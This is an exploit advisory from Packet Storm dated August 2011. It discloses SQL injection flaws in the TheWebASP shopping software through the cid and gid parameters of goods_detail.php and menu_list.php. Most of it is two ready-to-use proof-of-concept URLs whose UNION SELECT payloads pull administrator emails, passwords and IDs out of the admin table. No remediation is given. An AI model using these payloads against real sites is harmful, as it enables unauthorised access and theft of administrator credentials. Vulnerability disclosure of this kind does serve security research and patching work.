TheWebASP SQL Injection

2011-08-18T00:00:00
ID PACKETSTORM:104151
Type packetstorm
Reporter Robert Cooper
Modified 2011-08-18T00:00:00

Description

                                        
                                            `# Exploit Title: TheWebASP - Multiple SQL Injection vulnerabilities  
# Date: 8/17/2011  
# Author: Robert Cooper (admin[at]websiteauditing.org)  
# Software Link: http://www.thewebasp.com  
# Tested on: [Linux/Windows 7]  
#Vulnerable Parameters:  
  
goods_detail.php?cid=  
goods_detail.php?gid=  
menu_list.php?cid=  
  
  
##############################################################  
PoC:  
  
http://www.example.com/goods_detail.php?gid=4031&cid=-1 union all select group_concat(adminEmail,0x3a,adminPwd,0x3a,adminId),2,3,4,5,6,7,8,9,10,11,12 FROM admin--  
http://www.example.com/menu_list.php?cid=-99 union all select 1,2,3,4,group_concat(adminEmail,0x3a,adminPwd,0x3a,adminId),6,7 FROM admin--  
  
##############################################################  
www.websiteauditing.org  
www.areyousecure.net  
  
# Shouts to the Belegit crew  
`